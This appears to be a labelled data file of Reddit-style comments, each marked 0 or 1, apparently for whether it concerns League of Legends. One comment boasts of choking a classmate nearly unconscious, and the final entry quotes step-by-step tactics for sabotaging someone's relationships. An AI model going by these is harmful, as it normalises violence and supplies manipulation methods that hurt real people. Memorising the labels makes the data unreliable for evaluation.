0	Hold on a second there.  The placebo group also reported sexual and psyc side effects...despite the fact that they were taking a sugar pill.   Aside from that, the chance for side effects is very very low.  Have you looked at the sides for accutane?  Holy shit!  But, even something as mild as Asprin has the potential to kill you.  Some people are allergic to penicillin, yet look at how many lives it's saved!
0	Delivery Driver, going to the ghetto was a mixed bag of tips. If the customer was a regular they'd usually tip at least a little bit (especially if they were high at the time), but if they were a new customer and in the ghetto then I never expected a tip, ever. Worst is when they complain that you didn't put something on their food (when you did, I helped make the food too since it was a small shop) and then you have to drive 20 minutes back out to their house to replace it, after they didn't tip, just because they're too cheap to get extra whatever. (I saw the stuff on their counter on a napkin from the front door. Fuck those people.)
1	how i am motivate to play rank is duo q with someone or a friend. i usually duo q with my friends. how i get motivated is that i set goals for me self. the goals i set was be better then my friend in the game. if he's doing well i should be doing better. if your lane is doing do, help out other lanes. #tip ( if you know you can win lane, instead taking Flash Ignite take teleport as a summoner spell to help out each lane.
1	Yeah, just turn off all range indicators and learn your champion. It's much faster to intuitively hit someone with a skillshot rather than to try to aim to calculate.
1	I just think that they design stacking items to be balanced by the fact that they lose stacks if you die.   If you don't lose stacks upon a death it is imbalanced.   How imbalanced? I don't know. Maybe not enough to warrant a change.
1	While I agree leavers need harsher penalties, I do know that since the most recent patch, a lot of random disconnections have been happening. The way I see it, if the person who left makes some attempt to contact the other players with remorse, then maybe they don't deserve the full brunt of punishment. I dunno. I'm still pretty new to the game and so I don't know much about the ranked matches and what not. Hell, I have experienced whiners that drop when the bots whup their ass once after they talk a big game. So I reported them. I suppose it's all about how they go about the situation. I've also recently played a match where two players were dropping in and out of the game. And when they were there they made it known that they were having connection issues. So I didn't report them for that. I do agree though, leavers suck and need to be punished.
0	I was an entry level Tae Kwon Doe student but I had also been in quite a few streetfights previous & can honestly say I owned the all but 1 of the higher levelled belts because I was aggressive & used techniques that weren't taught
0	I applaud you for going back and I think it's important for everyone to receive an education. I love that there are returning students and I wish there were more of the good ones. I simply think that you should be unable to tell apart a returning student from a traditional one. When they start discussions about unrelated topics, it just points out that difference, which is unfortunate.   It seems I got railed for my statement, but it's merely the truth for what I've experienced. I would say out of about 10 returning students I've had in classes, 6 of them were these types. It might just be my university (as it's not very hard to get accepted in) but I've had mostly bad experiences. Now a few of them I've had in groups and have been awesome students, usually better about spending the appropriate amount of time on their work and being great with a group. Then there are the others, especially the ones that claim they're "too busy" to do their part because they "have lives." I work 30 hours a week and do a lot of community work outside of class, but it's never enough of an argument. BUT, you're 100% correct in that it's the job of the professor to put an end to this, but sadly many don't as to not be disrespectful.   I'm getting off topic.
1	You'd rather believe the rumors than what wings says? I find it hard to believe that redditors are that slow. If wings said that Salce put in as much effort as any one else, and that other people were slacking off before Aphro left, how is Salce the 'toxic element' here?   And besides, if you're referring to the interviews after the regionals, I must admit I felt he might have been in his right to say that his team didn't do that well. Only person besides Salce to do any good was Wings, I felt that their botlane was lacking, which is forgivable seeing as Mashme was new. Unstoppable has never impressed me that much.
1	The problem is that, at least here on BR, people who uses drop hack do not get a life time ban, it is just a  1 month ban .   2 months ago I was loosing a ranked solo queue game (~plat5), the game was pretty over, the enemy team was holding a big advantage against us. Around the 15min mark the game drops, I couldn't connect to it again and it disappeared from my match history. I knew that wasn't me using the drop hack, so I checked the other 4 guys. One of them was holding a full victory page and some of his matches had 2~3 hours difference between the others, who plays one match every 3 ours?   I created one support ticket about this guy and he got a ban, between my ticket and the ban he managed to go to platinum and changed his name. I saved his lolking page and 1 month after the ban he started to play again and changed his name one more time.   (1 month between voli and khazix match)
1	I won't say that TF is bad, but as a first pick in solo queue he most definitely is. Every time I encounter a first pick TF, I pick Ahri and destroy it (for example: diamond 2 TF vs me, a plat 1 ahri:   this was also a close game - at one point we lost an inhibitor even). If you have a champion you really enjoy go ahead and play it, but have some consideration for your team - ask if you can pick them something they want and swap, so that you can have more information when you go to pick him, etc. Furthermore, ranked is not a place for people to try something new, it is a place for people to try their best to win.
0	The press should be allowed to investigate and prepare a story on any case, and report  that  it is happening - BUT until a verdict is reached, they should be held to stricter standards against "false light" (or defamation if false light is considered to be a form of it) laws to protect individuals. Specifically, they shouldn't be allowed to report  who  is involved - including telling details - until there is a verdict, since all persons involved are legally innocent up to that point and reports necessarily, even if not intentionally, imply some degree of guilt.
0	Yes the Japanese are in the building a lot of hours but much of it isn't spent working.  There are probably 2-3 meetings a day where all that is required of them is to be a warm body in a seat.  Also, when the boss cuts out, most to all work stops because there is no authority figure they need to look busy for.  Yes there are some Japanese people who do work their tails off but no more than anywhere else.  They are at their job late because they tend to solely identify themselves with their job and, as such, so much of their socializing is either done at work or at  enkai  (work parties).  Also leaving "early" without a good excuse is looked down on because it can come across as not wanting to be a part of the team.  You don't necessarily have to be working your ass off when you are there.  You just have to be present.
1	You know today wasn't a complete loss for Cloud9, they should at least be able to take away that a win is possible vs SKT.   If the team that played yesterday was the same, confident team that competed in the LCS, they might have been able to pull out a victory. C9 is a much better team than they give themselves credit for. Not saying they will ALWAYS dominate, but instead they would stand a chance on the worlds stage.
1	Dear everyone else you can ward as well there have been times where i play a support (i main mid) and i have all my wards used and havent been back to base yet while 3 other people bitch at me to ward the map.
1	Okay man. I don't understand why you have a hard on for XJ9. I'm not going to write any more essays over a piece of shit like him just because you seem to have a spiritual "problem child" connection with him.   Destiny wrecked him because he was trying to have a logical conversation, but XJ9 is a psychopath and he has zero empathy or regret for his actions. He wasn't fucking trolling, cut that bullshit out. He couldn't understand how what he did was wrong. That is a serious problem. If he accepted that what he did was fucked up, I could sympathize, but he clearly doesn't. Ever since he was banned, he never ever sincerely considered his actions wrong and ALWAYS tries to come off as the victim in this situation. If given the chance he would 100% act up again, and I'd rather not be playing a game with volatile players like him. He hacked accounts, sent death threats which were proven to be him (they were proven, so stop with the "we have no proof" idiotic argument sympathizers are throwing around) fucked up ranked games over a personal vendetta he had against his girl. Just the fact that you're saying XJ9 isn't a toxic person shows me you have some fucked up connection with him. Riot has all the evidence they needed to ban him. He should stay banned, and I'm glad he is.
1	Basically every video is gonna be the same with a bronzie or a newbie trying to Learn Yasuo or Riven and failing. Literally, I have seen plays made and made plays with a lot of champs: teemo, soraka, cho, sona, thresh,  TARIC +NUNU NEMESIS DRAFT BROS4LYFE , Kennen, Annie, Kog'Maw, Singed, Ezreal, Draven, hell, if Taric didn't convince you, I've seen someone 1v4 as fucking Rammus. He died, but he got a Quadra. I'm not a good player by any means, and I've only made plays on a few of them, not all, but I've seen it done. Don't say a champ can't make plays just because they' don't 5 passive and bs mechanics.
1	Not this again... It is really a bad idea and you should know that if you saw other threads like this!   FOR ALL LAZY ONES!
0	Well, it DOES affect us on a much deeper level of our psychology. Our sexuality is more or less the foundation of our personality. It sets the mood for how we will interact with others based on our reaction to their physical appearance. This is altered by our actual interactions with them after we first see them, but if you apply chaos theory, then the initial state has great influence on the end result.   Getting myself back on topic, rape IS just another crime, but it affects us in a different way. When the part of our brain that deals with sexuality is traumatized, and our sexuality directly affects our interaction with others, the trauma very easily and noticeably affects our interactions with others from that point on more than other types of crime.   That being said, I think the reason society views rape as so different and horrible is because most religious mores include the idea of sex being objectively sinful except for the purpose of a husband and wife making a child. That stacked on top of the fact that it was a nonconsensual, usually aggressive criminal act, makes it seem twice as bad to those who place great value in tradition and religion, which is most Americans.
0	This is a problem with an uninformed electorate rather than term limits. People vote more based on passionate, distracting issues like gay marriage, abortion, etc. than foreign policy or economic policy.   Term limits would change a Congress member's primary motivation from reelection to following through on their campaign promises. The incumbent advantage would be somewhat nullified and we wouldn't be stuck with such a stagnant Congress.   You want to avoid Tea Party antics? You gotta address pork barrel politics ("I got mine, fuck you other hippie states"), the average voter that watches 10 minutes of Fox, CNN, NBC and makes a decision ("Republicans bad! Democrats good!" <and vice versa>), and fucked up election practices (Electoral College, Gerrymandering, etc.)
0	Honestly - does it matter if it's fake? Maybe the message we should be taking is to be this person in whatever way you can. Sure, not everyone can afford to buy a bunch of clothes for strangers, but I'm betting there's some way we can all be generous - be it with our money, our food, our old clothes, our food, or what have you.
0	This happened to me in middle school, eighth grade I think. It was teacher who I didn't have, yet from our various encounters I knew he didn't like me.  Not sure why... I was actually a very good kid.  Anyway, it's AFTER school, and I had just witnessed him take another student's phone away in the hallway as they were leaving. I was angry because I knew the school rules in our handbook explicitly stated: "No cell phones during school hours" and that "school hours were from 7:35 to 2:35."  I was like "bitch, it's 2:40." I took my phone out, walked right by him to get a reaction. Naturally he stops me and tries to take my phone. I say no. He insists that he must take it. I insist that he cannot. I pull out my assignment book (which has all the school policies) and show him the rule.  He says its wrong and he tries to grab the phone from my hands, but I don't let go. Eventually it's him and I staring at each other while both holding the phone. He won't let me leave with my phone. Sooner or later I end up giving it to him because I was going to miss my bus if I stayed longer. The next day I went to retrieve my phone from the Vice Principle and he yells at me for disrespecting a teacher and I get an after school detention. I explain that by the rules he was not in the right to take my phone away.  That didn't matter.  Fuck you Mr. Gubanich.
1	This. The rage some people are directing at their fellow Summoners trying out builds is off-putting. Optimal builds have been upended and the search for new ones is on.
0	I understand, it's always the content of the conversation that gets me. "Oh you go to college? you must be super smart! I'm not smart, thats why im cutting hurr! OH! sorry, did i get ya there!?" and that is when I stopped going to Great Clips because a fat ginger lopped off one of my fucking moles.
0	I was in a thread where that was announcing the new DLC in  X  game was available in the US for download, and the dude was commenting on every single comment and repeating the same info. It pissed several people (including myself) off.
0	Google "Sexual performance anxiety"   "Sex is supposed to be a pleasurable experience, but it's hard to feel sexy or intimate with your partner when you have sexual performance anxiety. When you're constantly wondering, "Am I doing this right?" "Is my partner enjoying this?" or "Do I look fat?" you become too preoccupied to enjoy sex.   "Constant worry over your appearance or ability in bed can make sex stressful and nerve-wracking. It can even make you want to avoid having sex.   "Sex is more than just a physical response. Arousal is tied into your emotions, too. When your mind is too stressed out to focus on sex, your body can't get excited either."
0	There are some fucked up people out there. A friend's girlfriend prohibited him getting braces (his teeth are really fucked up) because "he only wanted to look better for all the whores out there" (that's literal, my friend had her on speaker when she said this). She was mad when he got a job because "he was going to see all the whores that work there". Hell she even gave him her car so he wouldn't "see all the whores in the street".
0	Very first google result for "sagging pants prison"](   For a more realistic explanation, we have to take a trip back to the 90's: When you go to prison, you get handed a couple pairs of pants and a couple shirts. If small doesn't fit, you get the next size up. Except we haven't gotten any new mediums or larges in a while, so you just need to come back when we do have them.   For obvious reasons, there are no drawstrings on the pants. Elastic can only do so much as well. So you're left with the choice of knotting the waistband and looking like a country girl (always a good thing to do in a prison,) or letting them sag.   Then you get out. You go back to your old neighborhood. You put on your normal clothes, but they don't feel right anymore. They're too constrictive, too tight. So you get bigger clothes, and that comfortable feeling returns.   Then the kids who look up to you see that you're wearing your clothes like that. They want to be like you. You're the guy who stood up to the police, and went down on some bullshit charge. You're tough, you're in charge. You went to prison and came out in one piece.   So they start dressing like that, not realizing why you dressed like that. Now you've got a fashion statement, if an incredibly stupid one. Rappers and TV personalities start doing it. Next thing you know, Kanye is actually making a profit selling blank white t-shirts for $120.
1	When you are playing with flamers. The first bad thing they say that you do not like. Hit tab and click that speech bubble next to their name. You have no idea how efficient that button is. It just mutes them, and you have nothing to do with them any more. At the end game you can even report that player, and might not even see him ever again. You are getting these players, because those guys are mainly smurfing (making a new account to level up). So they get pretty annoyed when they see bad/new players. Yeah, it's not fair on new people who want to try out the game. I just hit the mute button. I hope this helped!
1	I'm going to go off and say something totally unjustified and false . We all know Hotshot is a level headed player who has never flamed in chat/stream consistently for a team mates poor performance. Hotshot is a humble respectable person who would never use his past in eSports as a feeling of self righteousness over the other players of his team. /s   I have heard Hotshot say "This guy doesn't deserve to talk to me" after Hotshot flamed him.
1	You make a lot of good points. I agree that the system is flawed there is no denying that. However when I am judging a case I personally look at everything. If the other players were being toxic to the player first I wouldn't punish them. If it was an obvious duo butt hurt about a jungle not ganking I wouldn't punish. When you say that they were from 6 months ago well they do take the worst reports and present them. The person more than likely had multiple reports on them recently but the one from 6 months ago was the worst. If the other reports were even close to as bad he surely deserves a punish. I doubt the cases have sat there for 6 months its just those were the worst ones out of all of them. If we could see every game, whether it was 20 games or what not you would have a better idea of what you were dealing with, but less people would do the tribunal with 20 games to read. So when I am presented with the cases of 5 games I think ok this guy must have had a lot of reports against him other than these 5. Its not like he had 5 games reported in the span of 2 years, that just wouldn't make sense and the tribunal guide state this does not happen. Maybe I'm not making a difference as an individual. But if there are others like me judging fairly than perhaps as a group we are. If no one did the tribunal the state of league would be a lot worse off than it is now. If I'm in plat and a guy who was toxic gets banned then its going to take a while for him to get back up to that point where he was banned from. Is he going to risk getting banned again and having to do it again. The majority of people would surely try to correct that behavior. Its the same deal as the judicial system, guy has 1 minor offense gets slap on the wrist. Multiple small infractions results in a harsher punishment, if he does even worse he goes to jail for a period of time. Depending on the circumstances I doubt this man would want to go back to jail so tries his best to stay out of trouble. I'm not saying the population of this world is perfect, but if even a few people whether its in league or in real world change their ways its definitely an improvement. You have to remember everything has flaws. But saying that the system does nothing is honestly for lack of a better word ignorant. Lets look at another example, children. When your child does something wrong you don't harshly punish them right away because that's cruel. You give them a light talking to. If bad behavior continues then its time to take action on a punishment. Adding up all their bad behavior for a proper punishment. The punishment would probably have to correlate with the worst things they have done. You aren't going to ground them for 2 weeks for simply screaming and refusing,to do something. But if they took a sharpie and drew dicks all over the house its punishment time.
0	I can explain this.   I, like you, have nothing left of middle school, except a couple football games (linebacker and wingback) and every bone I broke. 32 of those bastards. But high school and after high school came at me so damn fast I didn't have time to "remember when" with people.   Graduation, 3 kids faster than the fucks that made them, and a few deployments with the navy, and now I don't remember shit from the times that weren't important to me.   More or less, my life experiences after middle school are so much more valuable to me that middle school is just something that happened, not a memory.
0	Upvote.  I've been saying this for years, especially to people who comment that the world's becoming a more dangerous place.  No it isn't.  In fact, in first world nations, social ills like crime are on the decline.   Difference is, now instead of never even knowing about most of the horrible weather events or killings in the first place, we have every horrific event reported worldwide piped directly to our front page.   Problem is, the perception of a more dangerous world, or that 'people are getting worse' shapes our worldview and our decision making processes.   This is a subtle bias we should all be aware of.   Also gives one pause for thought when it comes to 'choosing' where one puts one's focus.
1	Thresh' s kit is well designed, because all the abilities work well and synergise with each other, as per, the kits of lee sin, vi or vel'koz. All of his kit revolves around one central theme; his being a prison warden, that enjoys torture. He's supposed to lock you down. He's supposed to make you fearful. Everything in his kit is built to achieve that, and mesh together to form a champion, not a set of four individual skills that have seemingly no interplay between them (I'm looking at you, taric and soraka).   Another example of a well designed support is lulu, built around the concept of being as annoying as humanely possible. She's a deranged, misunderstood yordle that just wants to play, with sometimes adverse effects for the recipients health. Her kit works together, and makes her the champion that she is.   Compare them to, say, Soraka, a champion with an extremely poorly designed kit (in my opinion) and you'll see what I mean. Calling stars upon your enemies, and silencing them, while serving as a portable fountain for your team. Where's the interplay? Where is the cohesive champion ideal? Where's the mechanical difficulty that makes a game rewarding and fun? It simply isn't there.   Thresh and lulu, along with many other recent champions are the models that we should be basic all other champions around, and should not be nerfed into the same state as their poorly designed, four year old counterparts. I'd rather have well designed champions that are fun to play be in the meta, whilst everything else is gradually brought up to the same level than all of said champions being nerfed into redundancy to allow for their 4-year old, poorly designed peers to take the limelight. That wouldn't be healthy for the overall future of the game.
0	Because fuck scorpions....   So many of those fuckers just appear on the floor when you least expect it. Even after the bug guy sprays his scorpion repellent... I killed one while I was taking a shit the other day.
1	I don't play ranked much, but I'm Silver V. Basically trash tier. I just theorycraft a lot. If I had a more reliable duo queue partner and was better with other champions, I would likely be gold. My win rate with Ez in ranked is 65% ish, it fluctuates. Problem is, people don't like you to play Mid AP Ez in ranked much, especially if you're solo queue. The build I gave you is inspired by xPeke's AP Ezreal, and I truly think it has hyper carry potential. Infinite kiting AND huge burst? Yes please.
1	actually i dont think they will raise NA's skill at all. Yes they will bring harder competition for a short time. But they aren't in their "better" enviroment anymore, where they got challenged by the Eastern Teams everyday. For example, i think LMQ would not perform pretty good against Korean/Chinese Teams, because they simply couldn't practice against enemies on the same skill level as they had in their eastern region.
0	Fuck that shit,
0	Yes, there's a lot of work to do when getting ready for a baby, but none of it depends on knowing if that baby will be a boy or a girl. Green, yellow, and purple are safe choices to stick with when getting a nursery ready and buying clothes. I think all parents should consider experiencing the fun surprise. - steps onto soapbox -   The ultrasound technician asked me and my wife if we wanted to know what we were having during our first pregnancy. We hadn't really thought about NOT finding out, we kinda just looked at each other and said OK. Presence of a wiener was confirmed. Feels incoming, lots of them and difficult to describe, but imagine a couple decades of hopes and dreams about a little boy riding a skateboard, playing little league, climbing trees, playing in the dirt, riding a bike, falling in love, getting his heart broken, falling in love again, shaving for the first time, driving his first car, going to college, becoming a man...all of it, rushing through your mind in one abrupt head-spinning moment. It's overwhelming. There's a lump in your throat and tears in your eyes, you feel like laughing and crying at the same time. All parents experience this. The preconceived notions about boys and girls can be different, but that moment of finding out is special. There's nothing wrong with finding out at the beginning of a pregnancy. I think most parents, like me and my wife, just don't think about it because practically everyone finds out. The fact that I knew a boy was going to be pulled out of my wife's belly, didn't change a thing. His birth was one of the best days of my life.   Fast forward three years. Somehow we're pregnant again. I tell my wife that I don't want to find out if we're having a boy or a girl. "No way, I can't do that" she said. "Well, I'm not finding out, so it's going to be impossible for only one of us to know." We talked about it a few times and for once, she agreed with me. The nursery was yellow and blue, but it didn't matter, a new baby was coming. Yellow and blue would be just fine.   Here are some of the great things about not knowing.   Everyone you talk to will be so surprised by your decision. OMG, I could never do that, they'll say. Remind them that not too long ago, NO ONE knew if they were having a boy or a girl. Your friends will likely see you as a rebel for living so dangerously. Don't be surprised if invitations to events like skydiving and running with the bulls become more frequent.   After the baby has arrived, mom and baby are resting and everything is calm, you get to make some calls to some important people in your life.  You can also share or tweet  No really, call the people that matter and tell them what went down. If everyone you know knows you're having a boy, the calls will go like this. "Everything went great, baby Joseph is perfect, mom is resting, we love you guys and can't wait to introduce you to him." Now don't get me wrong, that's a great call to make. Tears will be shed. BUT now, throw in the fact that the gender is a mystery and that shit's been building up for 9 months. Everyone you know has been playing the guessing game. It's a boy because your wife's carrying the baby low. It's a girl because your wife's farts smell like lavender. She craves whipped cream and chili dogs? That's a boy for sure. Whipped cream  ON  her chili dogs? Definitely a girl. Fact is, nobody knows for sure, and now you get to share. Don't be surprised when your voice cracks when saying "It's a boy!" or "It's a girl" the first few dozen times.   The doctors and nurses in the delivery room will be just as excited about the big mystery as you are! They almost never get to see parents experience THE surprise anymore. Plus, I think doctors really love producing a baby and saying "It's a girl!" or "It's a boy!" I like to imagine they rehearse this at home, similar to Chris Angel practicing pulling doves out of his back pocket.   THE surprise. Internal parental controls prevent me from saying that the birth of one child was better than the other, I wouldn't change a thing, they were both incredible experiences and two of the best days of my life. I have a few friends who have decided not to find out, some because I  interfered with their decision process  talked sweetly to them, and some on their own. I don't know anyone who regrets it. - steps down from soapbox -
0	In all honesty dude every campus is different, and so js every fraternity.  I went to a small college (800 was record enrollment my freshman year) and joined 1 of the 3 frats.  I hated the pledging experience, but after it I made life long friends and had a blast till my senior year wen I rage'd quit.   There are 3 reasons for which I quit, that should help you decide which feat is right for you.  1. Relationship with administration.  By my senior year the college admins decided to start cracking down on parties (not just frats) and made it impossible to have events that brought the student community together. This lead to a lot of the guys just sitting I. Their room doing circle jerks.  2. The physical house. Some houses are awesome, others suck.  When I pledge there was a frat of some cool guys, but during the walk through I saw 2 guys living in essentially a hallway, and another in a closet. I said fuck that. My former frat's house had a cool chapter room (complete with a secret room) and a sweet party room. However, since I was Vice President if student body I was on trustee board for facilities... Where I found out because of asbestos under tiles, which had shitty carpet glued to the top, that they were going to turn it into storage. When I asked what house my frat would get then they just laughed.  Which meant in 2 years no house. This leads into the third point.  3. God damn fucking alumns.   You will find, for most frats, that the alumns who show up other then homecoming have nothing going on in their life.  I tried telling all the alumns about the housing problem we would face, no one listened. No one cared, they just wanted a place to drink, have people "show" them respect, ad talk about the 3 years in college when they were cool.  The final straw was when they decided to kick out my friend for having a piece in the house. Not smoking, or selling pot. Just having a piece. As a house, we voted not to punish him. Then, without any kind of warning a few dip shit alumns and one rich asshole decided to have their own vote I kick him out. Needless to say I flipped the fuck out. I cursed all of them, pointed out the hypocrisy Sig as a former president who grew weed in the basement during he early 90's, brothers who fucked other brothers gf's and so on.  Needless to say, that frat has no house, is laughed at by he majority of campus and is dwindling down to very few active members.   It's a huge commitment, and it comes with a lot if bullshit. Despite all that,  I'd do it all over again.  I grew immensely as an individual. I learned to deal with the type of shenanigans you encounter in the office.  I don't think I would of ever thought about running for student council, I wouldn't of fucked as many bitches, and I would of missed a lot of parties.  All that said, to each their own, what is right for me probably isn't for you.  Ask your teachers what they think of the frats. They can often offer a unbiased view of the frat with more insight then just any student. Hope this helps.  Also, never never play soggy biscuit.
1	I don't get it.   Why is it that firstpick can disregard everyone else and instalock their champion/role of choice?   Why is that behaviour okay, when lastpick is possibly forced into something they aren't very good at?   Why is it that just because you are first/second pick you get to do whatever the hell you want to, simply because you have a bit more elo than the rest of your team (or in normal draft, because you got lucky)?   No I'm not saying that lastpick should be able to just scream "ME MID OR FEED" and then get mid simply because they said so.   What I'm saying is that shouldn't everyone be equal in terms of getting to play what they are best at/want to play?   In my opinion there is no difference to saying "Me mid or feed!" the moment you get into champion select and expecting to get that without any objection, and to disregarding the rest of your teams preferences and taking your lane of choice and then say "Sorry bud, I'm firstpick"
1	Scrims don´t mean much - they are for testing out new champs/new comps/new strategies and practising to shotcall from behind/even/ahead. They also wanna get a feeling for the playstyle/weaknesses/vision control/champion pool of their opponents.
0	I'll be the devil's advocate here and say that many girls do this... it's not necessarily that they are scumbags, but rather that they don't want to be alone. That's why they'll stay with the guy even if he's not a good boyfriend until they find someone better.   I knew a couple of really nice girls that knew their relationships weren't working and sometimes they were even abused. But rather stayed with their boyfriend than be left alone. It's not always the girl that's the scumbag... sometimes they just feel too weak to break up and be alone. A new boyfriend might be the only force to help a girl break up an old relationship. She might even take him as a savior.   And doing something like that what you've described to a girl that might have lived through some hard times would probably crush her.
1	It's not awful. If you play a style where you shield yourself more than the AD, it can work. Because you shield yourself, you have more ad to last hit and can go aggro.   Honestly it'd work in lower elos, where you might not be confident to play some of the skill based matchups Janna is supposed to win. (Leona, and Naut.) You'll die less, and provide slightly better sustain with well placed shields and relic.   However, it requires you manage your mana. Starting 3/1 or 2/2 Hp/Mana pots will probably be best. ( I'd try out 3/1 first.)   Also, you will probably have to practice last hitting if you suck at it. Don't expect to get every last hit. Go for the CS your AD is not going to get. And if you miss a cannon, it sucks.
0	Obviously there has to be physical attraction, but its often a combination of that and some emotional/eccentricity compatibility. If you are what the other person is looking for, then they are interested. If they aren't, its not because they can't appreciate you....they just said nope.
1	This is taken from :   Here goes:     SR = Summoners Rift, the 5v5 map   TT = Twisted Treeline     TF = Twisted Fate     WW = Warwick   GP = Gangplank   MK = Mordekaiser     Gl & hf = Good luck have fun     U2 = You too - most common response to the one above   bb = bye bye   ditto = you too aswell     AD = Attack Damage     AP = Ability Power   ArP = Armor Penetration   MR = Magic Resistance   MP = Magic Penetration   DPS = (Originally: Damage per second) Here: Classes relying on their autoattack to do damage - ie sustained damage over time through autoattack   CD = Cooldown   CDR = Cooldown Reduction   AS = Attack Speed   LS = Life steal   AoE = Area of Effect (abilities that effect a certain area, like annie's Tibbers, or akali's Twillight Shroud   DD = Direct Damage   AA = Auto Attack   JitB = Jack in the Box (Shaco skill)     RNG = Random Number Generator - alot of games are based on this concept (best example is critting, you have x% of crit, the computer then rolls, if you hit under your x% of crit, you attack will crit, if you hit over the x% of crit you will NOT crit)     FB = Usually refers to first blood early game (obviously before it is taken) and later game can mean fall back!   OP = Overpowered   UP = Underpowered   WP = Well played   GG = Good Game   BG = Bad Game   VGG = Very Good Game   GJ = Good Job   Feeder = Someone who dies alot to the other team hence "feeding" them gold   FFS = For FUCKS sake   omg = oh my god (or in some situations omFg = oh my FUCKING god)   n1 = nice one   L2P = Learn to play   FTW = For the win   FTL = For the loose   FML = Fuck my Life   STFU = Shut the fuck up...   IDK = I dont know...   IDC = I dont care   FYI = For your information     BP = Blue pill, a left over term from beta, means teleporting back to base     TP = Teleporting either to another lane or to base   OOM = Out of Mana   BRB = Be right back   AFK = Away from keyboard   Ulti = Ultimate, usually used with inc to warn due to a dangerous ultimate being near.   INC = Incomming   Mid / Top / Bot = The three lanes of SR, obviously only top and bot in TT   Prem = Premade   F***ING SHROOMS! = a common outburst after stepping in several teemo mushrooms in a row   SS = miss something often followed by the champion name   MIA = Missing in Action   (Insert champion)'s gone AWOL! = Absent without leave   OMW = On my way   ASAP = As soon as possible   IMO = In my opinion   Care = Means someone might approach if you are pushing to much, often followed by pings as to from where.   B = if pinged on you means fallback, in laning phase usually means a champion that has been back in base is back to relieve you.   Re = Term used after seeing champions stated missing again.     RoA = Rod of Ages     Zhonyas = Zhonya's Ring   FoN = Force of Nature   Pots = Potions, both mana / hp ones   Oracles = Oracles potion, used to spot stealthers   RS = Rylai's Scepter   GA = Guardian Angel   SotD = Sword of the Divine   SotO = Sword of the Occult   IE = Infinity Edge   BV = Banshee's Veil     Wards = Reffering to the two types of wards, vision wards (can detect stealth) and sight wards (can not detect stealth).     Baron/Nashor = The legendary monster on SR giving a teamwide buff   Golem / Lizard / Wolves / Ghouls = The blue/red/green/grey single buffs     IGN: In game Name
1	Giants look quite strong, especially Samux
0	Speaking as the person who grades these things, it's generally neither.   Of course, it depends on the class, the school, the instructor, etc. but statistically speaking, your grade is in most cases not an accurate reflection of how well you seem to understand the material.  It's more like a reflection of how well you did compared to the rest of the class, given that there are usually factors that prevent us from failing all or most of you.  Often we're going through a kind of checklist to see if you mentioned the things we wanted you to, if you seem to have a point, if we can figure out what it is, etc.  The person who gets an 'A' is rarely 'good' so much as 'not as breathtakingly terrible as the others'.  I sometimes see students who seem to genuinely engage with the material, and I have spent countless hours trying to learn to get them to do so, but most of the time people want to temporarily memorize the bare minimum, and they do quite badly at that.  Nobody is "good" at bullshitting.  What happens is, nearly everyone bullshits, and what they produce is bullshit.  We can tell you don't actually understand anything, but if your bullshit is marginally more coherent than the other drivel we get, we pretend to take it seriously.
0	I remember breaking this rule when I was younger.   Boondock Saints, I was speaking along with the prayers (we had all watched it way, way too many times), though only in a whisper so as not to annoy the others.   A bit later, the host of the event goes out to the kitchen to get some food, and when she comes back, she comes up to me and says I should probably stop. Apparently her mother had been watching us right during the first prayer scene, and had asked her in the kitchen if I was liable to snap.
1	Enlighten me with insults? Way to go "old man".   I don't care what is your % of leaver rate, because if you (or anybody else for that matter) have technical issues with your ISP and your internet connection, then it automatically means you are resposnable for more games ruined than other people who have better internet.   You leave more than others? You deal with the consequences, not the other players. Simple as that. Private leagues in DotA have always worked like that, and it has always worked fine.   FYI, a friend of mine has been testing the threshold of left games for the past 2 months, and he managed to not get banned by Leaver Buster with a percentaghe of 12 games left out of 100.
0	See that really doesn't work all the time. I'm a big guy (also fat) and everyone always felt they could poke fun at me. Not a serious constant bullying but enough to get on my nerves. So I told them to fuck off. Most of them were like "k, whatever we thought you were cool with it" and those aren't bullies in my opinion. There were a few (4 or 5) guys left who still thought it was hilarious to continue and one day one of them threw my waterbottle on the ground and I'm like "The fuck you do that for, stop it or I'll break your neck" so he thinks I'm joking and throws it on the ground again and I'm like "I will not say this again. Stop it or I will kill you." so he starts laughing and throws it on the ground again. I see red, push over the desk, grab him, put my arm around his neck and start choking the fuck out of him, while telling him "I told you this was gonna happen, why didn't you listen?". So he starts turning blue but I can't back down from what I promised him, I would just look weak and encourage this kind of behavior. I keep choking him and the other people now start shouting "Stop it ZeMilkman, don't kill him." but they are far away and I don't give a fuck. I see those 2 guys coming in and I know they will try to separate us and so I choke even harder to kill him before they do. Now they realize what's going on they start trying to get me off him but all they manage to do is loosen the choke a little, so they start shouting the names of 2 more guys who come in and now I have 2 guys pulling on each of my arms and they manage to get him out. So now the stronger 2 of them are restraining me, the other 2 are tending to the guy I am still intent on killing. So I struggle to get my arms free, lifting the one guy off his feet in the process. He lets go of my arm and now it's easy to get the other arm free. I am about to end the guy when I glance around and I see the terror on everyone faces, including my crush at that time. So I stop and tell him that he is lucky I will put mercy before justice this one time.   He never bothered me or anyone else again and we actually started hanging out together for a while.
0	They ask for resumes as well because it requires you to write coherently and efficiently, explaining previous jobs and responsibilities. Your resume also speaks loads about your ability to organize, create, and edit.
0	Yeah, I'm certain its bullshit.  >Using her boyfriends' credit cards to buy porn subscriptions or buy Porn DVDs online and sometimes replacing movies he owned with them. In order to use this trick repeatedly, I had to switch up the porn fetishes. Luckily, no woman ever believes the "It's not mine/I've never seen that before!" line. This is probably the best thing you can do to break people up. Convincing her boyfriends she has STDs/STIs. One time I hinted that she had pubic lice after lacing her underwear with stuff that made her itch her crotch constantly. He left soon after that. I found that people don't usually bother to confirm if the person they're dating has an STD/STI, although a couple times they did. Luckily, those relationships didn't work out without any intervention from me. This works best during the first couple of weeks people are dating. You also need to be able to keep a straight face when hinting someone has a STD/STI.  One time when I was 12, I convinced a guy that she was an alcoholic. I took empty bottles from our condo's recycling bins and hid them in my room until I had a good amount. Then I pretended to take out the recycling when she wasn't around and told him she had "one of those nights" and that she's "trying her best", etc. To be honest, I was surprised this actually worked because there were so many holes in my plan, like him bringing up the bottles I was taking out that clearly didn't belong to her. One guy really hated smoking, so I got my friend to steal a pack from his dad for me. I lit them randomly throughout the week, and tossed them outside once the room smelled like smoke. Then I'd leave the window open and put a bottle of air freshener out. I left the rest of the pack in her purse for him to find. Like with porn, "those don't belong to me" didn't seem to be a viable excuse. They had a big fight over it and then broke up. She had a habit of folding her money in a certain way at the corners so I stole money from her purse and slipped the bills into her boyfriend's wallet. When he used them to pay for dinner, she flipped out. I was really grasping at straws for this relationship, so it wasn't my best work to be honest. I'd convince them that she was cheating on them. The fact that she had an affair while married to my father made it all the more 